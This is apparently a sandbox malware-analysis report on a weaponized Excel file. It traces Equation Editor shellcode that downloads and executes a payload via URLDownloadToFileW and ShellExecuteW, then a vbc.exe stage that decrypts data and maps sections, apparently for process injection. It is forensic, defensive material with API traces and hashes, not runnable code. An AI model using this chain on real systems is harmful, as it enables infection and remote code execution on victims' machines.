Code Analysis

VBA Code

Call Graph

Graph

Entrypoint
Decryption Function
Executed
Not Executed
Show Help

Module: Sheet1

Declaration

Line	Content
1	Attribute VB_Name = "Sheet1"
2	Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
3	Attribute VB_GlobalNameSpace = False
4	Attribute VB_Creatable = False
5	Attribute VB_PredeclaredId = True
6	Attribute VB_Exposed = True
7	Attribute VB_TemplateDerived = False
8	Attribute VB_Customizable = True

Module: Sheet2

Declaration

Line	Content
1	Attribute VB_Name = "Sheet2"
2	Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
3	Attribute VB_GlobalNameSpace = False
4	Attribute VB_Creatable = False
5	Attribute VB_PredeclaredId = True
6	Attribute VB_Exposed = True
7	Attribute VB_TemplateDerived = False
8	Attribute VB_Customizable = True

Module: Sheet3

Declaration

Line	Content
1	Attribute VB_Name = "Sheet3"
2	Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
3	Attribute VB_GlobalNameSpace = False
4	Attribute VB_Creatable = False
5	Attribute VB_PredeclaredId = True
6	Attribute VB_Exposed = True
7	Attribute VB_TemplateDerived = False
8	Attribute VB_Customizable = True

Module: ThisWorkbook

Declaration

Line	Content
1	Attribute VB_Name = "ThisWorkbook"
2	Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
3	Attribute VB_GlobalNameSpace = False
4	Attribute VB_Creatable = False
5	Attribute VB_PredeclaredId = True
6	Attribute VB_Exposed = True
7	Attribute VB_TemplateDerived = False
8	Attribute VB_Customizable = True

Reset < >

Analysis Process: EQNEDT32.EXEPID: 2468, Parent PID: 576COMMON

Execution Graph

Execution Coverage:	26.7%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	91.5%
Total number of Nodes:	118
Total number of Limit Nodes:	4

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 036803EA Relevance: 6.1, APIs: 4, Instructions: 83
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryW.KERNEL32(036803DC), ref: 036803EA

Part of subcall function 03680404: URLDownloadToFileW.URLMON(00000000,03680415,?,00000000,00000000), ref: 03680457
Part of subcall function 03680404: ShellExecuteW.SHELL32(00000000,00000000,?,00000000,00000000,00000001), ref: 03680495
Part of subcall function 03680404: ExitProcess.KERNEL32(00000000), ref: 036804AD

Memory Dump Source

Source File: 00000002.00000002.975408347.0000000003680000.00000004.00000020.00020000.00000000.sdmp, Offset: 03680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3680000_EQNEDT32.jbxd

Similarity

API ID: DownloadExecuteExitFileLibraryLoadProcessShell
String ID:
API String ID: 2508257586-0
Opcode ID: 38c720feadbf5dad5981aba921efced7a42a9a910c39a4b6eccaf9e7f4503d3e
Instruction ID: 049f613004532eaaafbf12aa54dc78838506372021566122ce847591ef450506
Opcode Fuzzy Hash: 38c720feadbf5dad5981aba921efced7a42a9a910c39a4b6eccaf9e7f4503d3e
Instruction Fuzzy Hash: A421909658C3C17FDB13E7304C6AB65BF646F5B204F598ACEE1C2094D3E6985109C367

Uniqueness

Uniqueness Score: -1.00%

Function 0368035E Relevance: 4.6, APIs: 3, Instructions: 138
filenetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

URLDownloadToFileW.URLMON(00000000,03680415,?,00000000,00000000), ref: 03680457
ShellExecuteW.SHELL32(00000000,00000000,?,00000000,00000000,00000001), ref: 03680495
ExitProcess.KERNEL32(00000000), ref: 036804AD

Memory Dump Source

Source File: 00000002.00000002.975408347.0000000003680000.00000004.00000020.00020000.00000000.sdmp, Offset: 03680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3680000_EQNEDT32.jbxd

Similarity

API ID: DownloadExecuteExitFileProcessShell
String ID:
API String ID: 3584569557-0
Opcode ID: 180c6720955fa0275c0eec24ed2006c3c0bbcacbc4d58ea7b480e37a6d9e944b
Instruction ID: e8114fbbfbc0962057d1be545f9e1334a69201b852478c54b0d6248d6f69cc0d
Opcode Fuzzy Hash: 180c6720955fa0275c0eec24ed2006c3c0bbcacbc4d58ea7b480e37a6d9e944b
Instruction Fuzzy Hash: B4418B9688D3C17FD712E7304D69759BF247F2B200F5C8BCED0C2095A3E6989509C36A

Uniqueness

Uniqueness Score: -1.00%

Function 0368037A Relevance: 4.6, APIs: 3, Instructions: 129
filenetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

URLDownloadToFileW.URLMON(00000000,03680415,?,00000000,00000000), ref: 03680457
ShellExecuteW.SHELL32(00000000,00000000,?,00000000,00000000,00000001), ref: 03680495
ExitProcess.KERNEL32(00000000), ref: 036804AD

Memory Dump Source

Source File: 00000002.00000002.975408347.0000000003680000.00000004.00000020.00020000.00000000.sdmp, Offset: 03680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3680000_EQNEDT32.jbxd

Similarity

API ID: DownloadExecuteExitFileProcessShell
String ID:
API String ID: 3584569557-0
Opcode ID: d1562c64dea2ccc76f3bfddcc8f16ec22b5a81086f41fbf542f31fbc367e9b60
Instruction ID: 0d6ee4decb9d85773c377237dd886bda8f98bb16ef94d8d3968d89983f036121
Opcode Fuzzy Hash: d1562c64dea2ccc76f3bfddcc8f16ec22b5a81086f41fbf542f31fbc367e9b60
Instruction Fuzzy Hash: C0419A9648D3C17FD712E7304D6A75ABF64AF2B200F588BCED0C2091A3E6989109C366

Uniqueness

Uniqueness Score: -1.00%

Function 03680404 Relevance: 4.6, APIs: 3, Instructions: 68
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000002.00000002.975408347.0000000003680000.00000004.00000020.00020000.00000000.sdmp, Offset: 03680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3680000_EQNEDT32.jbxd

Similarity

API ID: DownloadExecuteExitFileProcessShell
String ID:
API String ID: 3584569557-0
Opcode ID: 98a7fbeb34c725494517927c3bfd6f471cd564496dbbf98808849b0c7ba56a06
Instruction ID: f35e16906ead22ef6e52d1fe60756a921cb61212d45fc4dc80da0ee8ad4970ab
Opcode Fuzzy Hash: 98a7fbeb34c725494517927c3bfd6f471cd564496dbbf98808849b0c7ba56a06
Instruction Fuzzy Hash: 88218C9298C3C16EDB13E7304C6DB55BF645F6B200F598ECEE1C2094D3E6988004C367

Uniqueness

Uniqueness Score: -1.00%

Function 03680455 Relevance: 4.5, APIs: 3, Instructions: 37
filenetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

URLDownloadToFileW.URLMON(00000000,03680415,?,00000000,00000000), ref: 03680457

Part of subcall function 0368046E: ShellExecuteW.SHELL32(00000000,00000000,?,00000000,00000000,00000001), ref: 03680495
Part of subcall function 0368046E: ExitProcess.KERNEL32(00000000), ref: 036804AD

Memory Dump Source

Source File: 00000002.00000002.975408347.0000000003680000.00000004.00000020.00020000.00000000.sdmp, Offset: 03680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3680000_EQNEDT32.jbxd

Similarity

API ID: DownloadExecuteExitFileProcessShell
String ID:
API String ID: 3584569557-0
Opcode ID: 07cc607ff6fd1e94c16f52aaa576454a02f797f3dbe1a9dc8390b874d58ec97d
Instruction ID: e889a86d9dc0c381fb8eb04071786b78832a6e07ccb77c07a54f7a4d5dba23ce
Opcode Fuzzy Hash: 07cc607ff6fd1e94c16f52aaa576454a02f797f3dbe1a9dc8390b874d58ec97d
Instruction Fuzzy Hash: BEF027906CC344B9FA52F7744C4AF6E6E549F99704F244E8DF1915D0D3E4C0840C823A

Uniqueness

Uniqueness Score: -1.00%

Function 03680483 Relevance: 3.0, APIs: 2, Instructions: 50
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ShellExecuteW.SHELL32(00000000,00000000,?,00000000,00000000,00000001), ref: 03680495

Part of subcall function 036804A8: ExitProcess.KERNEL32(00000000), ref: 036804AD

Memory Dump Source

Source File: 00000002.00000002.975408347.0000000003680000.00000004.00000020.00020000.00000000.sdmp, Offset: 03680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3680000_EQNEDT32.jbxd

Similarity

API ID: ExecuteExitProcessShell
String ID:
API String ID: 1124553745-0
Opcode ID: 9bb4a9efaea7c07eca078e7354966bed14a700fa2dbfda34c55d40211f488600
Instruction ID: f835223d8d4f530d2492f908917a7bc213094e56598efcbc1f1958d7cd6ec86d
Opcode Fuzzy Hash: 9bb4a9efaea7c07eca078e7354966bed14a700fa2dbfda34c55d40211f488600
Instruction Fuzzy Hash: 470126D5A8530671DB70FB288A05BBBAB55EF59710F8C8F5AA58104185E09480CB823B

Uniqueness

Uniqueness Score: -1.00%

Function 0368046E Relevance: 3.0, APIs: 2, Instructions: 47
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000002.00000002.975408347.0000000003680000.00000004.00000020.00020000.00000000.sdmp, Offset: 03680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3680000_EQNEDT32.jbxd

Similarity

API ID: ExecuteExitProcessShell
String ID:
API String ID: 1124553745-0
Opcode ID: 06ae39da83878116c64f3374cc61cb9a0bfbcad835969adbd94f613998411d03
Instruction ID: 99567df69b126cecb3410e716420e62b038ca97da35c975dc0af25d78745e969
Opcode Fuzzy Hash: 06ae39da83878116c64f3374cc61cb9a0bfbcad835969adbd94f613998411d03
Instruction Fuzzy Hash: CD0149A05C930570E770F7248E85BAEAA85EF89714FA88F5EF09108082E284854F823F

Uniqueness

Uniqueness Score: -1.00%

Function 036804A8 Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNEL32(00000000), ref: 036804AD

Memory Dump Source

Source File: 00000002.00000002.975408347.0000000003680000.00000004.00000020.00020000.00000000.sdmp, Offset: 03680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3680000_EQNEDT32.jbxd

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 288fe55cd219b45af00edd1f2cff87e2581c67c70a4523920e313d1c8e5ebd5b
Instruction ID: f49c04242a7a61e974833cf8218924656bc711991e28e6f13ed51e74029fe7d2
Opcode Fuzzy Hash: 288fe55cd219b45af00edd1f2cff87e2581c67c70a4523920e313d1c8e5ebd5b
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 036804AF Relevance: .0, Instructions: 14
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000002.00000002.975408347.0000000003680000.00000004.00000020.00020000.00000000.sdmp, Offset: 03680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3680000_EQNEDT32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15c3e4776a16804bb5212a09f03411bf1d00a4b4976dbaad078e0c99fd6b82f5
Instruction ID: 26eff70e60afb98986405b1a5d3e8bc2a113f6c8a09dec444d415cd87d2824f6
Opcode Fuzzy Hash: 15c3e4776a16804bb5212a09f03411bf1d00a4b4976dbaad078e0c99fd6b82f5
Instruction Fuzzy Hash: 14D05E31201502DFC304EB04C940E16F36AFFC8210B24C768D5004B719D730E891CAE4

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 03680345 Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNEL32(03680333), ref: 03680345

Memory Dump Source

Source File: 00000002.00000002.975408347.0000000003680000.00000004.00000020.00020000.00000000.sdmp, Offset: 03680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3680000_EQNEDT32.jbxd

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 012a95e31786f55606f2aae6733b7eafa3fe3ec4e00fc661099f0c1eee8d72ce
Instruction ID: 4c70d60e2bd8c021e9e8cd343150f8acde2bb79dabef51d8520351f033471137
Opcode Fuzzy Hash: 012a95e31786f55606f2aae6733b7eafa3fe3ec4e00fc661099f0c1eee8d72ce
Instruction Fuzzy Hash: FC11E25984E7C2BFD302F7701AAA149FF21B92B10075C8FCFC4854E1A3E655AA0E8396

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: vbc.exePID: 972, Parent PID: 2468COMMON

Execution Graph

Execution Coverage:	24.3%
Dynamic/Decrypted Code Coverage:	21.4%
Signature Coverage:	17.8%
Total number of Nodes:	523
Total number of Limit Nodes:	11

Executed Functions

Function 0FA4C6C0 Relevance: 93.0, APIs: 44, Strings: 9, Instructions: 227
encryptionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

#644.MSVBVM60(00000000,00000000,72A1C6D9,?,?,?,?,?,?,?,?,?,00000000,0FA32FF6), ref: 0FA4C6FE
__vbaStrCat.MSVBVM60( Enhanced R,Microsoft,?,?,?,?,?,?,?,?,00000000,0FA32FF6), ref: 0FA4C716
__vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,00000000,0FA32FF6), ref: 0FA4C723
__vbaStrCat.MSVBVM60(SA and AES Cryptogra,00000000,?,?,?,?,?,?,?,?,00000000,0FA32FF6), ref: 0FA4C72B
__vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,00000000,0FA32FF6), ref: 0FA4C732
__vbaStrCat.MSVBVM60(phic Provider,00000000,?,?,?,?,?,?,?,?,00000000,0FA32FF6), ref: 0FA4C73A
__vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,00000000,0FA32FF6), ref: 0FA4C741
#644.MSVBVM60(00000000,?,?,?,?,?,?,?,?,00000000,0FA32FF6), ref: 0FA4C744
CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,00000000,?,?,?,?,?,?,?,?,00000000,0FA32FF6), ref: 0FA4C754
__vbaFreeStrList.MSVBVM60(00000003,?,?,?,?,?,?,?,?,?,?,?,00000000,0FA32FF6), ref: 0FA4C771
#644.MSVBVM60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000,0FA32FF6), ref: 0FA4C785
__vbaStrCat.MSVBVM60( Enhanced R,Microsoft,?,?,?,?,?,?,?,?,?,?,?,?,00000000,0FA32FF6), ref: 0FA4C797
__vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,00000000,0FA32FF6), ref: 0FA4C79E
__vbaStrCat.MSVBVM60(SA and AES Cryptogra,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000,0FA32FF6), ref: 0FA4C7A6
__vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,00000000,0FA32FF6), ref: 0FA4C7AD
__vbaStrCat.MSVBVM60(phic Provider,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000,0FA32FF6), ref: 0FA4C7B5
__vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,00000000,0FA32FF6), ref: 0FA4C7BC
#644.MSVBVM60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000,0FA32FF6), ref: 0FA4C7BF
CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,00000008), ref: 0FA4C7CF
__vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 0FA4C7EC
#644.MSVBVM60(00000000), ref: 0FA4C800
__vbaStrCat.MSVBVM60(rosoft Enhan,Mic), ref: 0FA4C812
__vbaStrMove.MSVBVM60 ref: 0FA4C819
__vbaStrCat.MSVBVM60(ced RSA and AE,00000000), ref: 0FA4C821
__vbaStrMove.MSVBVM60 ref: 0FA4C828
__vbaStrCat.MSVBVM60(S Cryptographic Provider (Pr,00000000), ref: 0FA4C830
__vbaStrMove.MSVBVM60 ref: 0FA4C837
__vbaStrCat.MSVBVM60(ototype),00000000), ref: 0FA4C83F
__vbaStrMove.MSVBVM60 ref: 0FA4C846
#644.MSVBVM60(00000000), ref: 0FA4C849
CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,00000000), ref: 0FA4C859
__vbaFreeStrList.MSVBVM60(00000004,?,?,?,?), ref: 0FA4C87A
#644.MSVBVM60(00000000), ref: 0FA4C88E
__vbaStrCat.MSVBVM60(rosoft Enhan,Mic), ref: 0FA4C8A0
__vbaStrMove.MSVBVM60 ref: 0FA4C8A7
__vbaStrCat.MSVBVM60(ced RSA and AE,00000000), ref: 0FA4C8AF
__vbaStrMove.MSVBVM60 ref: 0FA4C8B6
__vbaStrCat.MSVBVM60(S Cryptographic Provider (Pr,00000000), ref: 0FA4C8BE
__vbaStrMove.MSVBVM60 ref: 0FA4C8C5
__vbaStrCat.MSVBVM60(ototype),00000000), ref: 0FA4C8CD
__vbaStrMove.MSVBVM60 ref: 0FA4C8D4
#644.MSVBVM60(00000000), ref: 0FA4C8D7
CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,00000008), ref: 0FA4C8E7
__vbaFreeStrList.MSVBVM60(00000004,?,?,?,?), ref: 0FA4C908

Strings

ced RSA and AE, xrefs: 0FA4C81C, 0FA4C8AA
Mic, xrefs: 0FA4C806, 0FA4C894
phic Provider, xrefs: 0FA4C735, 0FA4C7B0
SA and AES Cryptogra, xrefs: 0FA4C726, 0FA4C7A1
Enhanced R, xrefs: 0FA4C70F, 0FA4C790
Microsoft, xrefs: 0FA4C70A, 0FA4C78B
rosoft Enhan, xrefs: 0FA4C80B, 0FA4C899
ototype), xrefs: 0FA4C83A, 0FA4C8C8
S Cryptographic Provider (Pr, xrefs: 0FA4C82B, 0FA4C8B9

Memory Dump Source

Source File: 00000005.00000002.978411638.000000000FA31000.00000020.00000001.01000000.00000005.sdmp, Offset: 0FA30000, based on PE: true

Associated: 00000005.00000002.978404014.000000000FA30000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978611441.000000000FA88000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978618338.000000000FA8B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978618338.000000000FA96000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978618338.000000000FA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978618338.000000000FB0C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978618338.000000000FB14000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978618338.000000000FB1B000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_fa30000_vbc.jbxd

Similarity

API ID: __vba$Move$#644$AcquireContextCryptFreeList
String ID: Enhanced R$Mic$Microsoft$S Cryptographic Provider (Pr$SA and AES Cryptogra$ced RSA and AE$ototype)$phic Provider$rosoft Enhan
API String ID: 3973273867-1573692794
Opcode ID: 6a25684ae1d931c06cc328b41b4e737384a4393f0cf95d610c42d3b5ac769cab
Instruction ID: b519a1cfb8a619abdce2c62a3cdcad8e0c5dc43bc4ca042af7457719c83e89b0
Opcode Fuzzy Hash: 6a25684ae1d931c06cc328b41b4e737384a4393f0cf95d610c42d3b5ac769cab
Instruction Fuzzy Hash: 6B61F272E502587BDB11EBF4CC86EEF7BB8EF49751F104526F602E2141EEB859058BA0

Uniqueness

Uniqueness Score: -1.00%

Function 0FA4C020 Relevance: 63.5, APIs: 42, Instructions: 474
encryptionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__vbaVarCopy.MSVBVM60(?,?,72A1C6D9,?), ref: 0FA4C0B0

Part of subcall function 0FA4C6C0: #644.MSVBVM60(00000000,00000000,72A1C6D9,?,?,?,?,?,?,?,?,?,00000000,0FA32FF6), ref: 0FA4C6FE
Part of subcall function 0FA4C6C0: __vbaStrCat.MSVBVM60( Enhanced R,Microsoft,?,?,?,?,?,?,?,?,00000000,0FA32FF6), ref: 0FA4C716
Part of subcall function 0FA4C6C0: __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,00000000,0FA32FF6), ref: 0FA4C723
Part of subcall function 0FA4C6C0: __vbaStrCat.MSVBVM60(SA and AES Cryptogra,00000000,?,?,?,?,?,?,?,?,00000000,0FA32FF6), ref: 0FA4C72B
Part of subcall function 0FA4C6C0: __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,00000000,0FA32FF6), ref: 0FA4C732
Part of subcall function 0FA4C6C0: __vbaStrCat.MSVBVM60(phic Provider,00000000,?,?,?,?,?,?,?,?,00000000,0FA32FF6), ref: 0FA4C73A
Part of subcall function 0FA4C6C0: __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,00000000,0FA32FF6), ref: 0FA4C741
Part of subcall function 0FA4C6C0: #644.MSVBVM60(00000000,?,?,?,?,?,?,?,?,00000000,0FA32FF6), ref: 0FA4C744
Part of subcall function 0FA4C6C0: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,00000000,?,?,?,?,?,?,?,?,00000000,0FA32FF6), ref: 0FA4C754
Part of subcall function 0FA4C6C0: __vbaFreeStrList.MSVBVM60(00000003,?,?,?,?,?,?,?,?,?,?,?,00000000,0FA32FF6), ref: 0FA4C771
Part of subcall function 0FA4C6C0: #644.MSVBVM60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000,0FA32FF6), ref: 0FA4C785
Part of subcall function 0FA4C6C0: __vbaStrCat.MSVBVM60( Enhanced R,Microsoft,?,?,?,?,?,?,?,?,?,?,?,?,00000000,0FA32FF6), ref: 0FA4C797
Part of subcall function 0FA4C6C0: __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,00000000,0FA32FF6), ref: 0FA4C79E
Part of subcall function 0FA4C6C0: __vbaStrCat.MSVBVM60(SA and AES Cryptogra,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000,0FA32FF6), ref: 0FA4C7A6
Part of subcall function 0FA4C6C0: __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,00000000,0FA32FF6), ref: 0FA4C7AD
Part of subcall function 0FA4C6C0: __vbaStrCat.MSVBVM60(phic Provider,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000,0FA32FF6), ref: 0FA4C7B5
Part of subcall function 0FA4C6C0: __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,00000000,0FA32FF6), ref: 0FA4C7BC
Part of subcall function 0FA4C6C0: #644.MSVBVM60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000,0FA32FF6), ref: 0FA4C7BF
Part of subcall function 0FA4C6C0: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,00000008), ref: 0FA4C7CF

__vbaRedim.MSVBVM60(00000880,00000010,?,00000000,00000001,00000004,00000000), ref: 0FA4C0DD
__vbaVarZero.MSVBVM60 ref: 0FA4C102
__vbaVarMove.MSVBVM60 ref: 0FA4C132
__vbaVarMove.MSVBVM60 ref: 0FA4C14E
__vbaVarMove.MSVBVM60 ref: 0FA4C177
#644.MSVBVM60(?), ref: 0FA4C17D
__vbaVarMove.MSVBVM60 ref: 0FA4C1AA
__vbaErase.MSVBVM60(00000000,?), ref: 0FA4C1D6
__vbaRedim.MSVBVM60(00000880,00000010,?,00000000,00000001,00000003,00000000), ref: 0FA4C1F9
__vbaVarZero.MSVBVM60 ref: 0FA4C228

Part of subcall function 0FA4BF90: __vbaVarVargNofree.MSVBVM60(72A1A008,00000000,72A46AEE,?,?,?,?,?,00000000,0FA32FF6,0FA4D1CE), ref: 0FA4BFC7
Part of subcall function 0FA4BF90: __vbaStrVarVal.MSVBVM60(?,00000000,?,?,?,?,?,00000000,0FA32FF6,0FA4D1CE), ref: 0FA4BFD2
Part of subcall function 0FA4BF90: #644.MSVBVM60(00000000,?,?,?,?,?,00000000,0FA32FF6,0FA4D1CE), ref: 0FA4BFD9
Part of subcall function 0FA4BF90: __vbaFreeStr.MSVBVM60(?,?,?,?,?,00000000,0FA32FF6,0FA4D1CE), ref: 0FA4BFE5

__vbaVarMove.MSVBVM60(?), ref: 0FA4C277
__vbaLenBstr.MSVBVM60(?), ref: 0FA4C280
__vbaVarMove.MSVBVM60 ref: 0FA4C2A4
__vbaVarMove.MSVBVM60 ref: 0FA4C2CD
__vbaErase.MSVBVM60(00000000,?), ref: 0FA4C2F9
__vbaFreeVar.MSVBVM60 ref: 0FA4C317
CryptDeriveKey.ADVAPI32(?,00006610,?,00000000,?), ref: 0FA4C33C
__vbaRedim.MSVBVM60(00000880,00000010,?,00000000,00000001,00000005,00000000), ref: 0FA4C35B
__vbaVarZero.MSVBVM60 ref: 0FA4C38A
__vbaVarMove.MSVBVM60 ref: 0FA4C3BA
__vbaVarMove.MSVBVM60 ref: 0FA4C3DA
__vbaVarMove.MSVBVM60 ref: 0FA4C403
__vbaAryLock.MSVBVM60(?,00000000), ref: 0FA4C40F
#644.MSVBVM60(0FA32FF6), ref: 0FA4C421
__vbaAryUnlock.MSVBVM60(?), ref: 0FA4C431
__vbaVarMove.MSVBVM60 ref: 0FA4C464
#644.MSVBVM60(?), ref: 0FA4C476
__vbaVarMove.MSVBVM60 ref: 0FA4C4A3
__vbaErase.MSVBVM60(00000000,?), ref: 0FA4C4C9
__vbaRedimPreserve.MSVBVM60(00000080,00000001,?,00000011,00000001,?,00000000), ref: 0FA4C4E4
__vbaRedim.MSVBVM60(00000880,00000010,?,00000000,00000001,00000000,00000000), ref: 0FA4C509
__vbaVarZero.MSVBVM60 ref: 0FA4C538
__vbaErase.MSVBVM60(00000000,?), ref: 0FA4C562
__vbaRedim.MSVBVM60(00000880,00000010,?,00000000,00000001,00000000,00000000), ref: 0FA4C57D
__vbaVarZero.MSVBVM60 ref: 0FA4C5AC
__vbaErase.MSVBVM60(00000000,?), ref: 0FA4C5D6
__vbaRedim.MSVBVM60(00000880,00000010,?,00000000,00000001,00000001,00000000), ref: 0FA4C5F6
__vbaVarZero.MSVBVM60 ref: 0FA4C61B
__vbaVarMove.MSVBVM60 ref: 0FA4C641
__vbaErase.MSVBVM60(00000000,?), ref: 0FA4C667
__vbaFreeVar.MSVBVM60(0FA4C69E), ref: 0FA4C697

Memory Dump Source

Source File: 00000005.00000002.978411638.000000000FA31000.00000020.00000001.01000000.00000005.sdmp, Offset: 0FA30000, based on PE: true

Associated: 00000005.00000002.978404014.000000000FA30000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978611441.000000000FA88000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978618338.000000000FA8B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978618338.000000000FA96000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978618338.000000000FA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978618338.000000000FB0C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978618338.000000000FB14000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978618338.000000000FB1B000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_fa30000_vbc.jbxd

Similarity

API ID: __vba$Move$#644$Redim$EraseZero$Free$Crypt$AcquireContext$BstrCopyDeriveListLockNofreePreserveUnlockVarg
String ID:
API String ID: 3659106278-0
Opcode ID: bed6a2e63d447fb4927756733e267ea57aa357b6e60169a0fa217ffd3f3f0f8b
Instruction ID: a4d0fd0662821007d49ba29956c2491f54ca4a1f9f1bd0e721bac4bba63de4ea
Opcode Fuzzy Hash: bed6a2e63d447fb4927756733e267ea57aa357b6e60169a0fa217ffd3f3f0f8b
Instruction Fuzzy Hash: BB222970E002089FEB18DFA8D998FADBBB5FF84310F018159E519AB355DB74AA45CF60

Uniqueness

Uniqueness Score: -1.00%

Function 001F2C34 Relevance: 23.1, APIs: 8, Strings: 5, Instructions: 386
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

e, xrefs: 001F2FD4
egas, xrefs: 001F2FC6
\Microsoft.NET\Framework\, xrefs: 001F2FDB
m.ex, xrefs: 001F2FCD
D, xrefs: 001F3045

Memory Dump Source

Source File: 00000005.00000002.978014703.00000000001F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 001F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1f0000_vbc.jbxd

Similarity

API ID:
String ID: D$\Microsoft.NET\Framework\$e$egas$m.ex
API String ID: 0-1087957892
Opcode ID: 7dedae8e35398986174414f77deba81bdc27b61a9c1b597510ad186c0c01245d
Instruction ID: 0e5ef7d304520450a82dfa88c52cd751d3ced26bce292557ba53c0baaef7a0be
Opcode Fuzzy Hash: 7dedae8e35398986174414f77deba81bdc27b61a9c1b597510ad186c0c01245d
Instruction Fuzzy Hash: 5BE125B2D0465DAFCF21DFE5CC81AFEBBB8AF04304F14806AEA24A6241D7309A45CF54

Uniqueness

Uniqueness Score: -1.00%

Function 001F2CA6 Relevance: 23.1, APIs: 8, Strings: 5, Instructions: 369
nativeprocessthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtCreateSection.NTDLL(?,000F001F,00000000,?,00000040,08000000,00000000), ref: 001F2E92
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 001F2EBF
